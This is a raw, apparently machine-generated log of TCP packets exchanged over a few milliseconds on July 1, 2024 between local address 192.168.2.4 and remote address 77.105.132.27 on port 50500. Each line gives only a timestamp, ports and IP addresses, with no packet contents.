Jul 1, 2024 09:16:12.022998095 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.023024082 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.023032904 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.023041964 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.023051023 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.023060083 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.023068905 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.023073912 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.023101091 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.023118019 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.023128033 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.023137093 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.023140907 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.023169994 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.023225069 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.023236036 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.023242950 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.023246050 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.023278952 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.023302078 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.024331093 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.024410963 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.026349068 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.026431084 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.026669979 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.026679993 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.026688099 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.026696920 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.026705027 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.026714087 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.026730061 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.026740074 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.026738882 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.026748896 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.026757956 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.026798964 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.026823997 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.026853085 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.026910067 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.026918888 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.026959896 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027019024 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027029037 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027090073 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027100086 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027129889 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027141094 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027165890 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027200937 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027209044 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027219057 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027286053 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027302027 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027312040 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027319908 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027328968 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027337074 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027345896 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027354956 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027362108 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027364016 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027374029 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027381897 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027390003 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027398109 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027406931 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027415037 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027415037 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027437925 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027450085 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027455091 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027463913 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027472973 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027477026 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027482986 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027493000 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027494907 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027502060 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027512074 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027519941 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027520895 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027529955 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027533054 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027549028 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027558088 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027565956 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027568102 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027575970 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027605057 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027618885 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027631044 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027633905 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027641058 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027650118 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027658939 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027687073 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027694941 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027707100 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027709007 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027717113 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027726889 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027736902 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027745008 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027760983 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027769089 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027780056 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027821064 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027862072 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027899027 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027909040 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027918100 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027925968 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027934074 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027947903 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027952909 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.027956963 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027966976 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.027991056 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028008938 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028050900 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028052092 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028060913 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028069973 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028079033 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028086901 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028095961 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028104067 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028116941 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028120995 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028160095 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028207064 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028217077 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028224945 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028229952 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028233051 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028243065 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028251886 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028259039 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028259993 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028270960 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028284073 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028287888 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028291941 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028295040 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028299093 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028304100 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028345108 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028353930 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028357983 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028366089 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028373003 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028377056 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028382063 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028395891 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028434038 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028515100 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028525114 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028533936 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028542995 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028552055 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028559923 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028569937 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028579950 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028582096 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028589964 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028595924 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028637886 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028647900 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028659105 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028667927 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028677940 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028686047 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028703928 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028712034 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028712034 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028716087 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028729916 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028729916 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028740883 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028759956 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028772116 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028789043 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028809071 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028826952 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028834105 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028836012 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028901100 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.028953075 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028963089 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028974056 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028984070 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.028992891 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029001951 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.029002905 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029009104 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029026031 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029030085 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.029036045 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029061079 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.029082060 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029087067 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.029092073 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029103041 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029130936 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.029150009 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.029232025 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029246092 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029258966 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029275894 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029284954 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029287100 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.029294968 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.029308081 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029318094 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029326916 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029333115 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.029336929 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029345989 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.029346943 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.029395103 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.030149937 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.030261993 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.031256914 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.031323910 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.031335115 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.031399965 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.031661034 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.031692028 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.031723022 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.031795025 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.031805038 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.031814098 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.031877041 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.031884909 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.031985998 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.031995058 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032002926 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032011986 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032020092 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032031059 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032048941 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032057047 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032066107 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032097101 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032154083 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032161951 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032171965 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032213926 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032222033 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032289028 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032298088 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032305956 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032314062 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032324076 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032416105 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032424927 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032433987 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032443047 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032470942 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032479048 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032499075 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032561064 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032569885 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032578945 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032588959 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032669067 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032685041 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032779932 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032788992 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032815933 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032824993 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032922029 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032931089 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032939911 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032948971 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032960892 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032968998 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032977104 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032985926 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.032995939 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033004045 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033116102 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033124924 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033133030 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033142090 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033149958 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033159018 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033175945 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033185005 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033193111 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033200979 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033210039 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033217907 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033267975 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033278942 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033287048 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033296108 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033313990 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033322096 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033330917 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033339024 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033348083 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033365011 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033374071 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033382893 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033390999 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033400059 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033484936 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033493996 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033502102 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033513069 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033521891 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033530951 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033574104 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033584118 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033598900 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033607960 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033617020 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033626080 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033634901 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033643961 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033659935 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033682108 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033780098 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033788919 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033797979 CEST	50500	49747	77.105.132.27	192.168.2.4
